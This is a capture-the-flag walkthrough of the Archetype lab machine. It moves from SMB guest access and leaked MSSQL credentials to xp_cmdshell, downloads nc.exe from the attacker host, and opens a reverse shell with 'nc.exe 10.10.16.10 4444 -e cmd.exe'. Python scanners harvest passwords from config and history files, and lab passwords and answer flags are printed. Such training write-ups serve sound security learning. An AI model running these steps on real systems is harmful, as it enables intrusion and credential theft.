Archetype
Reconnaissance
IP: 10.129.44.22
Starting with a default Nmap scan (default scripts and version detection) we see four open ports.
nmap -sC -sV -Pn 10.129.44.22
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Full Nmap Output
For the full output see here: Archetype - Nmap Scan
The first service is Microsoft's implementation of RPC, MSRPC, on port 135. This specific endpoint is the RPC Endpoint Mapper: clients bind to it remotely to look up the other RPC services and the dynamic ports they listen on. For our purposes Nmap has already shown us the listening ports. Ports 139 and 445 both carry SMB: 139 is SMB over the NetBIOS session service, 445 is SMB directly over TCP, and Windows listens on both by default. The host script results also show that the server accepted a guest session (account_used: guest), and that SMB message signing is disabled, which Nmap flags as dangerous but which is the default on Windows hosts that are not domain controllers. Last but not least we can see an MSSQL server running on port 1433.
Gaining Access
From the Nmap scan we can see that the SMB server accepts a guest session. Let's see which shares are available, using smbclient.
smbclient -U 'guest' -L 10.129.44.22
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
The only share we are able to access with this account is backups; ADMIN$ and C$ require administrative credentials. Let's see what's inside.
smbclient -U 'guest' \\\\10.129.44.22\\backups
smb: \> dir
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
smb: \> get prod.dtsConfig
We find a file called prod.dtsConfig. This is an SSIS package configuration file, and it contains credentials for the MSSQL service. Here is the important line:
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
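A .dtsConfig file is plain XML, so the credentials can be pulled out automatically rather than by eye. The following Python helper is an added example, not code from the original writeup: it parses a constructed sample file shaped like the one recovered above (same connection string, plus a harmless second property), splits the OLE DB connection string into key/value pairs, and reports what each credential actually grants. Two details matter for the next step and are surfaced explicitly: Data Source=. means the default SQL instance on the very host that runs the package, and a DOMAIN\user style User ID is a Windows account, so the client must use Windows authentication. The impacket-mssqlclient command line it emits assumes the usual user:password@host syntax.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like an SSIS package configuration (.dtsConfig);
# the first ConfiguredValue is the connection string recovered from prod.dtsConfig.
SAMPLE_DTSCONFIG = r"""<?xml version="1.0"?>
<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Variables[User::BatchSize].Properties[Value]" ValueType="Int32">
    <ConfiguredValue>500</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(cs):
    """Split an OLE DB connection string into a dict with lower-cased keys."""
    props = {}
    for part in cs.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            props[key.strip().lower()] = value.strip()
    return props


def is_windows_account(user):
    """DOMAIN\\user or user@domain is a Windows account (integrated auth), not a SQL login."""
    return "\\" in user or "@" in user


def find_credentials(dtsconfig_xml):
    """Return every configured value that carries a password, with what it grants."""
    hits = []
    for conf in ET.fromstring(dtsconfig_xml).iter("Configuration"):
        props = parse_connection_string(conf.findtext("ConfiguredValue") or "")
        password = props.get("password") or props.get("pwd")
        if not password:
            continue
        user = props.get("user id") or props.get("uid") or ""
        server = props.get("data source") or props.get("server") or ""
        hits.append({
            "path": conf.get("Path"),
            "server": server,
            # '.' or '(local)' is the default instance on the host that runs the package
            "local_instance": server in (".", "(local)", "localhost"),
            "user": user,
            "password": password,
            "windows_auth": is_windows_account(user),
            # Persist Security Info=True keeps the password readable on the open connection
            "persist_security_info": props.get("persist security info", "").lower() == "true",
        })
    return hits


def mssqlclient_command(hit, target):
    """Build the impacket-mssqlclient invocation that matches the credential type."""
    user = hit["user"].replace("\\", "/")
    auth = "-windows-auth " if hit["windows_auth"] else ""
    return f"impacket-mssqlclient {auth}{user}:{hit['password']}@{target}"


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_DTSCONFIG):
        print(hit)
        print(mssqlclient_command(hit, "10.129.44.22"))
```

Because the Data Source is the local instance, the recovered password is only useful against the SQL Server on the file's own host, which here is the same machine that serves the share.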
After looking at the MSSQL page on Hacktricks I connected with mssqlclient.py from Impacket and enabled code execution. The User ID is a Windows account (ARCHETYPE\sql_svc), so Windows authentication is used rather than a SQL login.
impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.44.22
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
archetype\sql_svc
Now all that's left is to escalate to Administrator and find the flag. For convenience, let's get a reverse shell first. Start a simple HTTP server with Python on port 80 in a directory containing the netcat binary. I used locate to search for nc.exe, but it's also available online. Not sure if it's the right version since it doesn't say x64, but it works, so it's fine.
ls
nc.exe
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Then download it to the MSSQL server. I decided to do it with wget in PowerShell (where wget is an alias for Invoke-WebRequest). I found lots of useful commands on this Hacktricks site.
SQL> EXEC xp_cmdshell 'echo wget "http://10.10.16.10/nc.exe" -outfile "C:\Users\sql_svc\nc.exe" | powershell -noprofile'
EXEC xp_cmdshell is better than just xp_cmdshell. Not sure why, but plain xp_cmdshell can execute some commands and not others, especially commands that have a path inside. Just use the EXEC form and don't forget to wrap the command in single quotes ('...').
Now all that is left is to set up a Netcat listener on the attacker box and have the target connect back to it. Listener:
nc -lnvp 4444
Launch the shell:
SQL> EXEC xp_cmdshell 'C:\Users\sql_svc\nc.exe 10.10.16.10 4444 -e cmd.exe'
Don't forget -e cmd.exe. This connects you directly to cmd.exe; if you don't use that option you will just get a plain data stream, not a reverse shell.
And we get a shell! Let's also grab the user flag.
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.44.22] 49674
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
archetype\sql_svc
C:\Windows\system32>type C:\Users\sql_svc\Desktop\user.txt
3e7b102e7***********************
User Flag
3e7b102e78218e935bf3f4951fec21a3
Why not a more versatile reverse shell?
I'm not very proficient with reverse shells, so after a bit of research I just used the simplest Netcat shell I could find. The PowerShell one-liners on Hacktricks needed a PowerShell script with a reverse shell, which I didn't have, and the ones I found I couldn't get to run. So I simply downloaded the Netcat executable to the server and ran it.
Escalate Privileges
Now let's upload and run WinPEAS to try to escalate privileges. I found it on the Releases page on GitHub. I switched to PowerShell for an easier download.
C:\Windows\system32>powershell
PS C:\Windows\system32> wget "http://10.10.16.10/winPEASx64.exe" -OutFile C:\Users\sql_svc\winPEASx64.exe
PS C:\Windows\system32> C:\Users\sql_svc\winPEASx64.exe
Full WinPEAS Output
For the full output see here: Archetype - WinPEAS Output
The full output is very long, but luckily the most important parts are marked red. After examining those I found out that our account (sql_svc) has SeImpersonatePrivilege enabled, which means we can impersonate the Administrator and run commands with his privileges. I spent a ton of time researching this only to find out that it doesn't work on Windows Server 2019, which is what the VM is running. I was clueless and checked the solution, and found out that there is a history file which has the password. To be fair, WinPEAS found it and marked it red, but I thought it was not worth checking out. My mistake. Let's open this file now.
PS C:\Windows\system32> cat C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
The password seems to be MEGACORP_4dm1n!!. It ended up in the PSReadLine history because the administrator passed it on the net use command line, and PSReadLine stores every typed line in plain text. Now let's log in to the SMB shares we couldn't access before and get the flag.
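The history file is worth checking on every profile under C:\Users, not only the one we landed in, and net use is not the only command that takes a password on the command line. The following Python scanner is an added example, not part of the original writeup. The history sample is constructed: it contains the page's net use line plus decoys, including a net use that prompts for the password with * and therefore stores none, a cmdkey /pass:, a ConvertTo-SecureString with a plaintext argument and an sqlcmd -P. The -U/-P handling in parse_generic is a heuristic about common tool conventions, so treat its hits as leads to verify rather than certainties.

```python
import re
from pathlib import Path

# Per-user PSReadLine history on Windows, relative to each profile directory.
HISTORY_GLOB = "AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"

# Constructed sample history: the page's real line plus decoys. Line 3 uses '*',
# which makes net use prompt for the password, so nothing secret is recorded there.
SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
net use Z: \\fileserver\share * /user:corp\svc_backup
cmdkey /add:fileserver /user:corp\svc_backup /pass:Wint3r2020!
$sec = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
sqlcmd -S . -U sa -P S4Pass#1 -Q "select 1"
exit
"""


def tokenize(line):
    """Split a cmd/PowerShell line on whitespace, keeping double-quoted strings whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', line)]


def parse_net_use(tokens):
    """net use [drive] [\\\\server\\share] [password|*] [/user:name] ...
    After 'use', anything that is not a drive letter, a UNC path, a /switch or '*'
    is the password typed on the command line."""
    user = secret = None
    for tok in tokens[2:]:
        low = tok.lower()
        if low.startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("/") or tok.startswith("\\\\") or tok == "*":
            continue
        elif re.fullmatch(r"[A-Za-z]:", tok):
            continue
        else:
            secret = tok
    return user, secret


def parse_cmdkey(tokens):
    """cmdkey /add:target /user:name /pass:password stores the password in plain sight."""
    user = secret = None
    for tok in tokens[1:]:
        low = tok.lower()
        if low.startswith("/user:"):
            user = tok[len("/user:"):]
        elif low.startswith("/pass:"):
            secret = tok[len("/pass:"):]
    return user, secret


def parse_securestring(tokens):
    """ConvertTo-SecureString <plaintext> -AsPlainText -Force, or -String <plaintext>."""
    for i, tok in enumerate(tokens):
        if tok.lower() == "convertto-securestring":
            rest = tokens[i + 1:]
            if rest and rest[0].lower() == "-string":
                rest = rest[1:]
            if rest and not rest[0].startswith("-"):
                return None, rest[0]
    return None, None


def parse_generic(tokens):
    """Heuristic for other tools: -U/-P style switches and Password=/Pwd= pairs."""
    user = secret = None
    for i, tok in enumerate(tokens):
        low = tok.lower()
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if low in ("-u", "-user", "--user", "-username") and nxt:
            user = nxt
        elif low in ("-p", "-password", "--password", "-pw") and nxt:
            secret = nxt
        else:
            m = re.match(r"(?i)^(?:password|pwd)=(.+)$", tok)
            if m:
                secret = m.group(1)
    return user, secret


def scan_history(text):
    """Return one finding per history line that carries a credential on the command line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        tokens = tokenize(line)
        if not tokens:
            continue
        head = tokens[0].lower()
        if head in ("net", "net.exe") and len(tokens) > 1 and tokens[1].lower() == "use":
            tool, (user, secret) = "net use", parse_net_use(tokens)
        elif head in ("cmdkey", "cmdkey.exe"):
            tool, (user, secret) = "cmdkey", parse_cmdkey(tokens)
        elif any(t.lower() == "convertto-securestring" for t in tokens):
            tool, (user, secret) = "ConvertTo-SecureString", parse_securestring(tokens)
        else:
            tool, (user, secret) = tokens[0], parse_generic(tokens)
        if secret:
            findings.append({"line": n, "tool": tool, "user": user, "secret": secret})
    return findings


def scan_all_users(users_root=r"C:\Users"):
    """Walk every profile's history file; meant to run on the target, not exercised offline."""
    return {str(h): scan_history(h.read_text(errors="replace"))
            for h in Path(users_root).glob("*/" + HISTORY_GLOB)}
```

Run on the target, scan_all_users() covers every profile the current user can read; the same scanner doubles as a blue-team check for credentials leaking into command history.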
smbclient -U 'Administrator' \\\\10.129.44.22\\C$
smb: \> get Users\Administrator\Desktop\root.txt
And we are done!
Flag
b91ccec3305e98240082d4474b848528